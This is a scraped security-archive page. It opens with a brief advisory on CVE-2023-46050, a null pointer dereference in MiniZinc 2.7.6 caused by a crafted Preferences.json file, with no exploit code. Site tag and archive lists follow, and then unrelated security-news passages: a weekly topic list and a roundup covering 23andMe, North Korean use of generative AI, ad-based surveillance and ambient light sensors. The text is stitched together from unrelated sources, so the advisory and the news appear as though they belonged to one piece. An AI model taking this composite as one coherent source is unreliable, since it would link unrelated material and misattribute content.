Authored by Meng Ruijie

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

tags | advisory

advisories | CVE-2023-46050

SHA-256 | a80cb0270b834776631af2ca8f8daa61229fb0418cf1801a697093adfbf995c9

Download | Favorite | View

**MiniZinc 2.7.6 Null Pointer**

    [Vulnerability description]A null pointer deference existed in MiniZinc v.2.7.6 via a crafted Preferences.json file.[VulnerabilityType Other]null pointer deference[Vendor of Product]MiniZinc[Affected Product Code Base]MiniZinc - 2.7.6[Reference]https://github.com/MiniZinc/libminizinc/issues/729[CVE Reference]The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46050 to this vulnerability.

**File Tags**

*   ActiveX (932)
*   Advisory (83,946)
*   Arbitrary (16,508)
*   BBS (2,859)
*   Bypass (1,810)
*   CGI (1,031)
*   Code Execution (7,521)
*   Conference (685)
*   Cracker (843)
*   CSRF (3,365)
*   DoS (24,223)
*   Encryption (2,377)
*   Exploit (52,460)
*   File Inclusion (4,241)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,819)
*   Intrusion Detection (902)
*   Java (3,111)
*   JavaScript (884)
*   Kernel (6,899)
*   Local (14,626)
*   Magazine (586)
*   Overflow (12,942)
*   Perl (1,429)
*   PHP (5,167)
*   Proof of Concept (2,359)
*   Protocol (3,677)
*   Python (1,585)
*   Remote (31,191)
*   Root (3,610)
*   Rootkit (517)
*   Ruby (615)
*   Scanner (1,646)
*   Security Tool (7,948)
*   Shell (3,224)
*   Shellcode (1,216)
*   Sniffer (898)
*   Spoof (2,236)
*   SQL Injection (16,468)
*   TCP (2,420)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,325)
*   Web (9,813)
*   Whitepaper (3,763)
*   x86 (966)
*   XSS (18,088)
*   Other

**File Archives**

*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,058)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,953)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,425)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,371)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (14,947)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,245)
*   UNIX (9,356)
*   UnixWare (187)
*   Windows (6,620)
*   Other

MiniZinc 2.7.6 Null Pointer

A list of topics we covered in the week of January 22 to January 28 of 2024

January 25, 2024 - Chinese speaking users looking for Telegram, or LINE are being targeted with malicious ads. Instead of downloading the legitimate application, they install malware.

January 25, 2024 - ThreatDown has earned 37/37 awards over nine consecutive quarters.

January 24, 2024 - 2023 was the worst ransomware year on record for Education.

January 24, 2024 - Your smart devices may reveal information about you or your location to an ex-partner. Here's how to lock them out.

January 24, 2024 - Apple has released new security updates for several products including a patch for a zero-day vulnerability which may have been exploited.

 A week in security (January 22 &#8211; January 28) 

Plus: North Korean hackers get into generative AI, a phone surveillance tool that can monitor billions of devices gets exposed, and ambient light sensors pose a new privacy risk.

Police took a digital rendering of a suspect's face, generated using DNA evidence, and ran it through a facial recognition system in a troubling incident reported for the first time by WIRED this week. The tactic came to light in a trove of hacked police records published by the transparency collective Distributed Denial of Secrets. Meanwhile, information about United States intelligence agencies purchasing Americans' phone location data and internet metadata without a warrant was revealed this week only after US senator Ron Wyden blocked the appointment of a new NSA director until the information was made public. And a California teen who allegedly used the handle Torswats to carry out hundreds of swatting attacks across the US is being extradited to Florida to face felony charges.

The infamous spyware developer NSO Group, creator of the Pegasus spyware, has been quietly planning a comeback, which involves investing millions of dollars lobbying in Washington while exploiting the Israel-Hamas war to stoke global security fears and position its products as a necessity. Breaches of Microsoft and Hewlett-Packard Enterprise, disclosed in recent days, have pushed the espionage operations of the well-known Russia-backed hacking group Midnight Blizzard back into the spotlight. And Amazon-owned Ring said this week that it is shutting down a feature of its controversial Neighbors app that gave law enforcement a free pass to request footage from users without a warrant.

WIRED had a deep dive this week into the Israel-linked hacking group known as Predatory Sparrow and its notably aggressive offensive cyberattacks, particularly against Iranian targets, which have included crippling thousands of gas stations and setting a steel mill on fire. With so much going on, we've got the perfect quick weekend project for iOS users who want to feel more digitally secure: Make sure you've upgraded your iPhone to iOS 17.3 and then turn on Apple's new Stolen Device Protection feature, which could block thieves from taking over your accounts.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

After first disclosing a breach in October, the ancestry and genetics company 23andMe said in December that personal data from 6.9 million users was impacted in the incident stemming from attackers compromising roughly 14,000 user accounts. These accounts then gave attackers access to information voluntarily shared by users in a social feature the company calls DNA Relatives. 23andMe has blamed users for the account intrusions, saying that they only occurred because victims set weak or reused passwords on their accounts. But a state-mandated filing in California about the incident reveals that the attackers started compromising customers’ accounts in April and continued through much of September without the company ever detecting suspicious activity—and that someone was trying to guess and brute-force users' passwords.

North Korea has been using generative artificial intelligence tools “to search for hacking targets and search for technologies needed for hacking,” according to a senior official at South Korea's National Intelligence Service who spoke to reporters on Wednesday under the condition of anonymity. The official said that Pyongyang has not yet begun incorporating generative AI into active offensive hacking operations but that South Korean officials are monitoring the situation closely. More broadly, researchers say they are alarmed by North Korea's development and use of AI tools for multiple applications.

The digital ad industry is notorious for enabling the monitoring and tracking of users across the web. New findings from 404 Media highlight a particularly insidious service, Patternz, that draws data from ads in hundreds of thousands of popular, mainstream apps to reportedly fuel a global surveillance dragnet. The tool and its visibility have been marketed to governments around the world to integrate with other intelligence agency surveillance capabilities. “The pipeline involves smaller, obscure advertising firms and advertising industry giants like Google. In response to queries from 404 Media, Google and PubMatic, another ad firm, have already cut-off a company linked to the surveillance firm,” 404's Joseph Cox wrote.

Researchers from MIT’s Computer Science and Artificial Intelligence Laboratory have devised an algorithm that could be used to convert data from smart devices' ambient light sensors into an image of the scene in front of the device. A tool like this could be used to turn a smart home gadget or mobile device into a surveillance tool. Ambient light sensors measure light in an environment and automatically adjust a screen's brightness to make it more usable in different conditions. But because ambient light data isn't considered to be sensitive, these sensors automatically have certain permissions in an operating system and generally don't require specific approval from a user to be used by an app. As a result, the researchers point out that bad actors could potentially abuse the readings from these sensors without users having recourse to block the information stream.

Tag

#apple